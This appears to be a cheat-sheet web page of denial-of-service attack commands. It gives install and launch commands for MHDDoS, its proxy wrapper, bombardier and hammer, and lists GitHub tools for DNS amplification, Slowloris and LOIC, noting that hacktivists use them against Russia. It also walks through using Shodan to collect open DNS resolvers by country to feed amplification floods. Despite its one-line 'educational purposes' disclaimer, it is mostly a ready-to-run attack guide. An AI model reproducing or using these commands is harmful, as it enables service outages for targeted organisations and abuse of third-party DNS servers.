drwxr-xr-x 8 root root 4096 Dec 14 2017 SMB and RPC Enumeration
drwxr-xr-x 8 root root 4096 Dec 14 2017 Web Enumeration
drwxr-xr-x 8 root root 4096 Dec 14 2017 Linux PrivEsc
drwxr-xr-x 8 root root 4096 Jun 15 2021 Linux CommandsDDoSTL;DR You can grab and parse these commands from this page using cURL:curl -s https://harfordcda.neocities.org/ddos.html | sed 's/<[^>]*>//g ; /^$/d'| tr -s '\n' '\n' | sed -r /^r?$/d > ddos.txt
All DDoS scripts are for educational purposes#################################### MHDDOS ####################################
sudo apt update
sudo apt install python3-pip
git clone https://github.com/MHProDev/MHDDoS.git && cd MHDDoS
pip3 install -r requirements.txt
#Script utilizes over 50 methods of attack
#Layer 7 example
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
#Layer4 example
python3 start.py udp 1.1.1.1:53 1 100
python3 start.py dns 1.1.1.1:53 1 100 dns.txt
#For guidance:
python3 start.py tools
python3 start.py help
#################################### MHDDOS with wrapper ####################################
sudo apt update
#MHDDoS can also be deployed using a wrapper, to hit mutiple servers at the same time, the wrapper is setup so that MHDDoS dir must be in the mhddos_proxy dir as shown below:
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/MHProDev/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt
#example is shown below
python3 runner.py tcp://IP:port tcp://IP:port
#################################### Bombardier ####################################
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd6
chmod 770 bombardier-linux-amd64
chmod +x bombardier-linux-amd64
#Bombadier written in Go
#example ./bombardier-linux-amd64 -c 200 -d 10s -l host
######################################## hammer ########################################
sudo apt install python
sudo apt install git
sudo apt install syslinux-utils
sudo apt install jq
git clone https://github.com/cyweb/hammer
cd hammer
python3 hammer.py -s host
########################################The following Github pages are scripts being used by hackivist groups currently fighting the Russian invasion of Ukraine. For more information visit their Telegram channels:IT Army of Ukraine WebsiteIT Army of Ukraine Telegram ChannelCyber Partisans Telegram Channel########################################
https://github.com/seedpockets/ukrainian-warship
https://github.com/ajax-lives/NoRussian - HTML ajax ddos
https://github.com/thesc1entist/j0lt - dns amplification tool
https://github.com/OffensivePython/Saddam - dns amplification tool
https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection
https://github.com/XCHADXFAQ77X/SLOWLORIS - another Slowloris
https://github.com/gkbrk/slowloris.git - another Slowloris repo
https://github.com/cyweb/hammer - DOS
https://github.com/TermuxHackz/Hammer - same tools for Termux on android.
https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack
https://github.com/LimerBoy/Impulse
https://github.com/maxng07/dns-flood #Another flood
https://ufonet.03c8.net/ #UFOnet
https://sourceforge.net/projects/loic/ #LOIC
https://github.com/PraneethKarnena/DDoS-Scripts #Various DDOS scripts
########################################How do I find DNS servers vulnerable to amplification?########################################
apt-get install shodan
#Grab your API key by logging into shodan.io and then add it in terminal
shodan init "api key"
#Now you can fetch search results using shodan
shodan search port:53 Recursion: enabled
#To download, you can subsitute country code "ru" for any country or run it without
shodan download results.json.gz 'country:ru port:53 Recursion: enabled'
#To parse the results
shodan parse --fields ip_str search.json.gz > dns_amp_list.txt
cat dns_amp_list.txt
#a file of vulnerable are now stored in a text file
# the file can then be used when running MHDDoS, example:
python3 ./start.py DNS ip:port 1000 1000 dns_amp.txt